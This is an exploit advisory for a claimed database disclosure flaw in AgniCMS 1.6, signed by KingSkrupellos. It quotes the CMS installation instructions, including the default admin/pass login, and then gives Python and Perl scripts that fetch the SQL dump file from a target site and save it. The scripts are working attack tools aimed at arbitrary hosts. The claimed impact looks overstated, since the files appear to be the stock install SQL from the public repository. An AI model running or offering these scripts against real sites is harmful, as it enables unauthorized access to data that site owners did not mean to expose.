AgniCMS 1.6 Database Disclosure

2019.06.02
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-200

########################################################################### # Exploit Title : AgniCMS 1.6 Database Disclosure # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 01/06/2019 # Vendor Homepage : agnicms.org # Software Download Link : github.com/AgniCMS/agni-cms/archive/master.zip # Software Information Link : github.com/AgniCMS/agni-cms cmsmatrix.org/matrix/cms-matrix/agni-cms # Software Version : 1.6 # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Vulnerability Type : CWE-200 [ Information Exposure ] CWE-538 [ File and Directory Information Exposure ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos # Acunetix Reference Link About => [ phpMyAdmin SQL Dump File ] acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/ # Acunetix Reference Link About : [ Possible Database Backup File ] acunetix.com/vulnerabilities/web/possible-database-backup/ ########################################################################### # Information about Software : **************************** Free Content Management System CMS build on Codeigniter framework. ########################################################################### # Impact : *********** * The product stores sensitive information in files or directories that are accessible to actors outside of the intended control sphere. * An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information. * phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the World Wide Web. It can be used to dump a database or a collection of databases for backup or transfer to another SQL server (not necessarily a MySQL server). The dump typically contains SQL statements to create the table, populate it, or both. This file contains an phpMyAdmin SQL dump. This information is highly sensitive and should not be found on a production system. * It looks like this file contains a database backup/dump. Acunetix inferred this filename from the domain name. A database backup contains a record of the table structure and/or the data from a database and is usually in the form of a list of SQL statements. A database backup is most often used for backing up a database so that its contents can be restored in the event of data loss. This information is highly sensitive and should never be found on a production system. Remediation : Sensitive files such as database backups should never be stored in a directory that is accessible to the web server. As a workaround, you could restrict access to this file. ########################################################################### =====Installation instruction English===== The installation is divided into two types to choose just one. A. Easy install. 1. Extract files from the zip or 7z into the directory of the website. 2. Browse to the web address and followed by /install. eg http://localhost/install. 3. Read the instructions on the screen including change permission to writable on the directories and files and follow the step by step until finished. 4. Delete the directory /install 5. Finished. B. Manual install. 1. Extract files from the zip or 7z into the directory of the website. 2. Set write and delete permission to these directories and files. (chmod 777 on Linux, read/write/delete on Windows). - application/cache. - application/logs. - modules (all sub directories and files) - public/upload (all sub directories and files) - public/themes. 3. Import install/agni-empty-install.sql in to database. 4. Change configuration in application/config/database.php and these things must be configured correctly. - hostname, username, password, database. 5. Delete the directory /install 6. Go to the site admin page at /site-admin and use this username and password (admin/pass). ########################################################################### File and Informations : ******************** /agni-empty-install.sql -- phpMyAdmin SQL Dump -- version 3.3.10 -- phpmyadmin.net -- -- Host: localhost -- Server version: 5.5.24 -- PHP Version: 5.4.3 -- Database: `v_agnicms_multisite` raw.githubusercontent.com/AgniCMS/agni-cms/master/install/agni-empty-install.sql /agni-sampledata-empty.sql - phpMyAdmin SQL Dump -- version 3.3.10 -- phpmyadmin.net -- -- Host: localhost -- Generation Time: Apr 19, 2013 at 11:55 AM -- Server version: 5.5.24 -- PHP Version: 5.4.3 -- Database: `v_agnicms_multisite` raw.githubusercontent.com/AgniCMS/agni-cms/master/install/agni-sampledata-empty.sql /agni-sampledata-simple.sql -- phpMyAdmin SQL Dump -- version 3.3.10 -- phpmyadmin.net -- -- Host: localhost -- Server version: 5.5.24 -- PHP Version: 5.4.3 -- Database: `v_agnicms_multisite` raw.githubusercontent.com/AgniCMS/agni-cms/master/install/agni-sampledata-simple.sql ########################################################################### # Database Disclosure Information Exposure Exploit 1 : *********************************************** #!/usr/bin/python import string import re from urllib2 import Request, urlopen disc = "/agni-empty-install.sql" url = raw_input ("URL: ") req = Request(url+disc) rta = urlopen(req) print "Result" html = rta.read() rdo = str(re.findall("resources.*=*", html)) print rdo exit ########################################################################### # Database Disclosure Information Exposure Exploit 2 : *********************************************** #!/usr/bin/perl -w # Author : KingSkrupellos # Team : Cyberizm Digital Security Army use LWP::Simple; use LWP::UserAgent; system('cls'); system('AgniCMS 1.6 Database Disclosure Exploit'); system('color a'); if(@ARGV < 2) { print "[-]How To Use\n\n"; &help; exit(); } sub help() { print "[+] usage1 : perl $0 site.com /path/ \n"; print "[+] usage2 : perl $0 localhost / \n"; } ($TargetIP, $path, $File,) = @ARGV; $File="agni-empty-install.sql"; my $url = "http://" . $TargetIP . $path . $File; print "\n Wait Please Dear Hacker!!! \n\n"; my $useragent = LWP::UserAgent->new(); my $request = $useragent->get($url,":content_file" => "D:/agni-empty-install.sql"); if ($request->is_success) { print "[+] $url Exploited!\n\n"; print "[+] Database saved to D:/agni-empty-install.sql\n"; exit(); } else { print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n"; exit(); } ########################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ###########################################################################


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